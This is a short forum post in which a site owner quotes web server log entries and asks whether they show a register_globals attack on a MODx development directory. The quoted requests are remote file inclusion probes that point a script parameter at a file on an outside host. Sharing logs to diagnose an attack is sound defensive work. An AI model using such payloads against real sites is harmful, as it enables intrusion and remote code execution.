I think I may have found it in the log file. If turning off register_globals will fix this, that’s a huge help. I’m glad you guys are here to teach this stuff and answer questions without making me feel like an idiot.
(just when I thought I was getting the hang of it too!)
I found a bunch of entries similar to this:
64.191.102.117 - - [04/May/2009:00:39:52 -0400] "GET ///host/patch/modules/sync/export.php?export_to=
http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 9867 "-" "Mozilla/5.0"
64.191.102.117 - - [04/May/2009:00:39:52 -0400] "GET /localprograms/onthemenu/recipes///host/patch/modules/sync/export.php?export_to=
http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 9867 "-" "Mozilla/5.0"
So if I’m interpreting it right, this WASN’T the reflect exploit but just a simple hack of the register_globals, which I should always keep off, and they happened to find my development directory of MODx by luck?